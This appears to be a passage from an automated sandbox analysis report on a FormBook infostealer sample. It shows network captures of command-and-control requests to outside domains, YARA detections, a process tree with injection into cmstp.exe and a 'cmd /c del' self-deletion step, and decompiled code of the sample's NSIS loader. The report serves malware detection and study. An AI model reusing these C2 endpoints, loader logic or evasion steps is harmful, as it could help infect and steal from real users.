                                                                        Apr 8, 2021 11:10:38.605781078 CEST5124INData Raw: 50 33 55 43 44 61 59 67 2f 34 41 2f 4a 38 2b 65 6d 71 41 74 30 47 53 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73
                                                                        Data Ascii: P3UCDaYg/4A/J8+emqAt0GSW9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBW
                                                                        Apr 8, 2021 11:10:38.715487957 CEST5126INData Raw: 39 79 46 49 39 70 49 64 59 71 59 66 31 4d 41 4e 36 52 49 2b 77 53 49 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37
                                                                        Data Ascii: 9yFI9pIdYqYf1MAN6RI+wSI/qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMf


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        7192.168.2.34973980.67.16.880C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:10:48.780775070 CEST5144OUTGET /evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.tor-one.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:48.808635950 CEST5144INHTTP/1.1 302 Moved Temporarily
                                                                        Server: nginx
                                                                        Date: Thu, 08 Apr 2021 09:10:48 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 154
                                                                        Connection: close
                                                                        Location: http://leere.seite
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        8192.168.2.349740188.93.150.7580C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:10:53.912617922 CEST5146OUTGET /evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.de-knutselkeet.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:53.936810970 CEST5146INHTTP/1.1 301 Moved Permanently
                                                                        Date: Thu, 08 Apr 2021 09:10:53 GMT
                                                                        Server: Apache/2.4.10
                                                                        Location: https://www.skkek.nl/wp/de-knutselkeet/
                                                                        Content-Length: 247
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 6b 6b 65 6b 2e 6e 6c 2f 77 70 2f 64 65 2d 6b 6e 75 74 73 65 6c 6b 65 65 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.skkek.nl/wp/de-knutselkeet/">here</a>.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        9192.168.2.34974345.88.202.11580C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:10:59.077899933 CEST5165OUTGET /evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.autotrafficbot.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:59.105108976 CEST5166INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Thu, 08 Apr 2021 09:10:59 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.autotrafficbot.com/evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Code Manipulations

                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        Analysis Process: TazxfJHRhq.exe PID: 4736 Parent PID: 5772

                                                                        General

                                                                        Start time:11:09:16
                                                                        Start date:08/04/2021
                                                                        Path:C:\Users\user\Desktop\TazxfJHRhq.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\TazxfJHRhq.exe'
                                                                        Imagebase:0x400000
                                                                        File size:207024 bytes
                                                                        MD5 hash:F818665DD48A93C48255D3CEADF92A6E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Chronological Activities

                                                                        Analysis Process: TazxfJHRhq.exe PID: 5940 Parent PID: 4736

                                                                        General

                                                                        Start time:11:09:17
                                                                        Start date:08/04/2021
                                                                        Path:C:\Users\user\Desktop\TazxfJHRhq.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\TazxfJHRhq.exe'
                                                                        Imagebase:0x400000
                                                                        File size:207024 bytes
                                                                        MD5 hash:F818665DD48A93C48255D3CEADF92A6E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Chronological Activities

                                                                        Analysis Process: explorer.exe PID: 3388 Parent PID: 5940

                                                                        General

                                                                        Start time:11:09:22
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:
                                                                        Imagebase:0x7ff714890000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Analysis Process: cmstp.exe PID: 4064 Parent PID: 3388

                                                                        General

                                                                        Start time:11:09:32
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\SysWOW64\cmstp.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                                        Imagebase:0x1190000
                                                                        File size:82944 bytes
                                                                        MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:moderate

                                                                        Chronological Activities

                                                                        Analysis Process: cmd.exe PID: 5948 Parent PID: 4064

                                                                        General

                                                                        Start time:11:09:37
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:/c del 'C:\Users\user\Desktop\TazxfJHRhq.exe'
                                                                        Imagebase:0x10a0000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Analysis Process: conhost.exe PID: 5320 Parent PID: 5948

                                                                        General

                                                                        Start time:11:09:37
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6b2800000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >

                                                                          Analysis Process: TazxfJHRhq.exe PID: 4736 Parent PID: 5772 TazxfJHRhq.exeCOMMON

                                                                          Executed Functions

                                                                          Function 0040314A, Relevance: 86.0, APIs: 28, Strings: 21, Instructions: 282stringfilecomCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 86%
                                                                          			_entry_() {
				struct _SHFILEINFOA _v356;
				long _v372;
				char _v380;
				int _v396;
				CHAR* _v400;
				signed int _v404;
				signed int _v408;
				char _v416;
				intOrPtr _v424;
				intOrPtr _t31;
				void* _t36;
				CHAR* _t41;
				signed int _t43;
				CHAR* _t46;
				signed int _t48;
				int _t52;
				signed int _t56;
				void* _t78;
				CHAR* _t89;
				signed int _t90;
				void* _t91;
				CHAR* _t96;
				signed int _t97;
				signed int _t99;
				signed char* _t103;
				CHAR* _t105;
				signed int _t106;
				void* _t108;

				_t99 = 0;
				_v372 = 0;
				_t105 = "Error writing temporary file. Make sure your temp folder is valid.";
				_v380 = 0x20;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x7a3030 = _t31;
				SHGetFileInfoA(0x79e540, 0,  &_v356, 0x160, 0); // executed
				E004059BF(0x7a2780, "NSIS Error");
				_t89 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				GetTempPathA(0x400, _t89);
				_t36 = E00403116(_t108);
				_t109 = _t36;
				if(_t36 != 0) {
					L2:
					_t96 = "\"C:\\Users\\hardz\\Desktop\\TazxfJHRhq.exe\" ";
					DeleteFileA(_t96); // executed
					E004059BF(_t96, GetCommandLineA());
					 *0x7a2f80 = GetModuleHandleA(0);
					_t41 = _t96;
					if("\"C:\\Users\\hardz\\Desktop\\TazxfJHRhq.exe\" " == 0x22) {
						_v404 = 0x22;
						_t41 =  &M007A9001;
					}
					_t43 = CharNextA(E004054F7(_t41, _v404));
					_v408 = _t43;
					while(1) {
						_t91 =  *_t43;
						_t112 = _t91;
						if(_t91 == 0) {
							break;
						}
						__eflags = _t91 - 0x20;
						if(_t91 != 0x20) {
							L7:
							__eflags =  *_t43 - 0x22;
							_v404 = 0x20;
							if( *_t43 == 0x22) {
								_t43 = _t43 + 1;
								__eflags = _t43;
								_v404 = 0x22;
							}
							__eflags =  *_t43 - 0x2f;
							if( *_t43 != 0x2f) {
								L17:
								_t43 = E004054F7(_t43, _v404);
								__eflags =  *_t43 - 0x22;
								if(__eflags == 0) {
									_t43 = _t43 + 1;
									__eflags = _t43;
								}
								continue;
							} else {
								_t43 = _t43 + 1;
								__eflags =  *_t43 - 0x53;
								if( *_t43 == 0x53) {
									__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
									if(( *(_t43 + 1) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000002;
										__eflags = _t99;
									}
								}
								__eflags =  *_t43 - 0x4352434e;
								if( *_t43 == 0x4352434e) {
									__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
									if(( *(_t43 + 4) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000004;
										__eflags = _t99;
									}
								}
								__eflags =  *(_t43 - 2) - 0x3d442f20;
								if( *(_t43 - 2) == 0x3d442f20) {
									 *(_t43 - 2) =  *(_t43 - 2) & 0x00000000;
									__eflags = _t43 + 2;
									E004059BF("C:\\Users\\hardz\\AppData\\Local\\Temp", _t43 + 2);
									L22:
									_t46 = E00402C37(_t112, _t99); // executed
									_t105 = _t46;
									if(_t105 != 0) {
										L32:
										E00403501();
										__imp__OleUninitialize();
										if(_t105 == 0) {
											__eflags =  *0x7a3014;
											if( *0x7a3014 != 0) {
												_t106 = E00405CD2("ADVAPI32.dll", "OpenProcessToken");
												_t97 = E00405CD2("ADVAPI32.dll", "LookupPrivilegeValueA");
												_t90 = E00405CD2("ADVAPI32.dll", "AdjustTokenPrivileges");
												__eflags = _t106;
												if(_t106 != 0) {
													__eflags = _t97;
													if(_t97 != 0) {
														__eflags = _t90;
														if(_t90 != 0) {
															_t56 =  *_t106(GetCurrentProcess(), 0x28,  &_v400);
															__eflags = _t56;
															if(_t56 != 0) {
																 *_t97(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t90(_v424, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t52 = ExitWindowsEx(2, 0);
												__eflags = _t52;
												if(_t52 == 0) {
													E00401410(9);
												}
											}
											_t48 =  *0x7a302c;
											__eflags = _t48 - 0xffffffff;
											if(_t48 != 0xffffffff) {
												_v396 = _t48;
											}
											ExitProcess(_v396);
										}
										E004052BF(_t105, 0x200010);
										ExitProcess(2);
									}
									if( *0x7a2f94 == _t46) {
										L31:
										 *0x7a302c =  *0x7a302c | 0xffffffff;
										_v396 = E00403526();
										goto L32;
									}
									_t103 = E004054F7(_t96, _t46);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t116 = _t103 - _t96;
									_t105 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t89, "~nsu.tmp\\");
										CreateDirectoryA(_t89, 0);
										_v404 = _v404 & 0x00000000;
										do {
											 *0x79d940 = 0x22;
											lstrcatA(0x79d940, _t89);
											lstrcatA(0x79d940, "Au_.exe");
											DeleteFileA(0x79d941);
											if(_t105 == 0) {
												goto L43;
											}
											if(lstrcmpiA(GetModuleFileNameA( *0x7a2f80, 0x79e140, 0x400) + 0x79e13a,  &M004091A1) == 0) {
												goto L32;
											}
											if(CopyFileA(0x79e140, 0x79d941, 0) != 0) {
												E00405707(0x79d941, 0);
												if("C:\\Users\\hardz\\AppData\\Local\\Temp" == 0) {
													E00405513(0x79e140);
												} else {
													E004059BF(0x79e140, "C:\\Users\\hardz\\AppData\\Local\\Temp");
												}
												lstrcatA(0x79d940, "\" ");
												lstrcatA(0x79d940, _v400);
												lstrcatA(0x79d940, " _?=");
												lstrcatA(0x79d940, 0x79e140);
												E004054CC(0x79d940);
												_t78 = E00405247(0x79d940, _t89);
												if(_t78 != 0) {
													CloseHandle(_t78);
													_t105 = 0;
												}
											}
											L43:
											"Au_.exe" =  &("Au_.exe"[1]);
											_v404 = _v404 + 1;
										} while (_v404 < 0x1a);
										goto L32;
									}
									 *_t103 =  *_t103 & 0x00000000;
									_t104 =  &(_t103[4]);
									if(E004055AC(_t116,  &(_t103[4])) == 0) {
										goto L32;
									}
									E004059BF("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									E004059BF("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									_t105 = 0;
									goto L31;
								}
								goto L17;
							}
						} else {
							goto L6;
						}
						do {
							L6:
							_t43 = _t43 + 1;
							__eflags =  *_t43 - 0x20;
						} while ( *_t43 == 0x20);
						goto L7;
					}
					goto L22;
				}
				GetWindowsDirectoryA(_t89, 0x3fb);
				lstrcatA(_t89, "\\Temp");
				if(E00403116(_t109) == 0) {
					goto L32;
				}
				goto L2;
			}































                                                                          0x00403153
                                                                          0x00403156
                                                                          0x0040315a
                                                                          0x0040315f
                                                                          0x00403164
                                                                          0x0040316b
                                                                          0x00403171
                                                                          0x00403187
                                                                          0x00403197
                                                                          0x0040319c
                                                                          0x004031a7
                                                                          0x004031ad
                                                                          0x004031b2
                                                                          0x004031b4
                                                                          0x004031da
                                                                          0x004031da
                                                                          0x004031e0
                                                                          0x004031ee
                                                                          0x00403202
                                                                          0x00403207
                                                                          0x00403209
                                                                          0x0040320b
                                                                          0x00403210
                                                                          0x00403210
                                                                          0x00403220
                                                                          0x00403226
                                                                          0x0040328f
                                                                          0x0040328f
                                                                          0x00403291
                                                                          0x00403293
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040322c
                                                                          0x0040322f
                                                                          0x00403237
                                                                          0x00403237
                                                                          0x0040323a
                                                                          0x0040323f
                                                                          0x00403241
                                                                          0x00403241
                                                                          0x00403242
                                                                          0x00403242
                                                                          0x00403247
                                                                          0x0040324a
                                                                          0x0040327f
                                                                          0x00403284
                                                                          0x00403289
                                                                          0x0040328c
                                                                          0x0040328e
                                                                          0x0040328e
                                                                          0x0040328e
                                                                          0x00000000
                                                                          0x0040324c
                                                                          0x0040324c
                                                                          0x0040324d
                                                                          0x00403250
                                                                          0x00403258
                                                                          0x0040325b
                                                                          0x0040325d
                                                                          0x0040325d
                                                                          0x0040325d
                                                                          0x0040325b
                                                                          0x00403260
                                                                          0x00403266
                                                                          0x0040326e
                                                                          0x00403271
                                                                          0x00403273
                                                                          0x00403273
                                                                          0x00403273
                                                                          0x00403271
                                                                          0x00403276
                                                                          0x0040327d
                                                                          0x00403297
                                                                          0x0040329b
                                                                          0x004032a4
                                                                          0x004032a9
                                                                          0x004032aa
                                                                          0x004032af
                                                                          0x004032b3
                                                                          0x00403316
                                                                          0x00403316
                                                                          0x0040331b
                                                                          0x00403323
                                                                          0x0040344e
                                                                          0x00403455
                                                                          0x00403471
                                                                          0x0040347e
                                                                          0x00403487
                                                                          0x00403489
                                                                          0x0040348b
                                                                          0x0040348d
                                                                          0x0040348f
                                                                          0x00403491
                                                                          0x00403493
                                                                          0x004034a3
                                                                          0x004034a5
                                                                          0x004034a7
                                                                          0x004034b4
                                                                          0x004034c3
                                                                          0x004034cb
                                                                          0x004034d3
                                                                          0x004034d3
                                                                          0x004034a7
                                                                          0x00403493
                                                                          0x0040348f
                                                                          0x004034d8
                                                                          0x004034de
                                                                          0x004034e0
                                                                          0x004034e4
                                                                          0x004034e4
                                                                          0x004034e0
                                                                          0x004034e9
                                                                          0x004034ee
                                                                          0x004034f1
                                                                          0x004034f3
                                                                          0x004034f3
                                                                          0x004034fb
                                                                          0x004034fb
                                                                          0x0040332f
                                                                          0x00403336
                                                                          0x00403336
                                                                          0x004032bb
                                                                          0x00403306
                                                                          0x00403306
                                                                          0x00403312
                                                                          0x00000000
                                                                          0x00403312
                                                                          0x004032c4
                                                                          0x004032d1
                                                                          0x004032c8
                                                                          0x004032ce
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004032d0
                                                                          0x004032d0
                                                                          0x004032d0
                                                                          0x004032d5
                                                                          0x004032d7
                                                                          0x004032dc
                                                                          0x00403342
                                                                          0x0040334a
                                                                          0x00403350
                                                                          0x0040335f
                                                                          0x00403361
                                                                          0x0040336a
                                                                          0x00403375
                                                                          0x0040337f
                                                                          0x00403387
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004033b3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004033c9
                                                                          0x004033d2
                                                                          0x004033de
                                                                          0x004033ee
                                                                          0x004033e0
                                                                          0x004033e6
                                                                          0x004033e6
                                                                          0x004033f9
                                                                          0x00403403
                                                                          0x0040340e
                                                                          0x00403415
                                                                          0x0040341b
                                                                          0x00403422
                                                                          0x00403429
                                                                          0x0040342c
                                                                          0x00403432
                                                                          0x00403432
                                                                          0x00403429
                                                                          0x00403434
                                                                          0x00403434
                                                                          0x0040343a
                                                                          0x0040343e
                                                                          0x00000000
                                                                          0x00403449
                                                                          0x004032de
                                                                          0x004032e1
                                                                          0x004032ec
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004032f4
                                                                          0x004032ff
                                                                          0x00403304
                                                                          0x00000000
                                                                          0x00403304
                                                                          0x00000000
                                                                          0x0040327d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403231
                                                                          0x00403231
                                                                          0x00403231
                                                                          0x00403232
                                                                          0x00403232
                                                                          0x00000000
                                                                          0x00403231
                                                                          0x00000000
                                                                          0x00403295
                                                                          0x004031bc
                                                                          0x004031c8
                                                                          0x004031d4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          APIs
                                                                          • #17.COMCTL32 ref: 00403164
                                                                          • OleInitialize.OLE32(00000000), ref: 0040316B
                                                                          • SHGetFileInfoA.SHELL32(0079E540,00000000,?,00000160,00000000), ref: 00403187
                                                                            • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,007A2780,NSIS Error), ref: 004031A7
                                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004031BC
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004031C8
                                                                            • Part of subcall function 00403116: CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
                                                                          • DeleteFileA.KERNELBASE("C:\Users\user\Desktop\TazxfJHRhq.exe" ), ref: 004031E0
                                                                          • GetCommandLineA.KERNEL32 ref: 004031E6
                                                                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000), ref: 004031F5
                                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000020), ref: 00403220
                                                                          • OleUninitialize.OLE32(00000000,00000000,00000020), ref: 0040331B
                                                                          • ExitProcess.KERNEL32 ref: 00403336
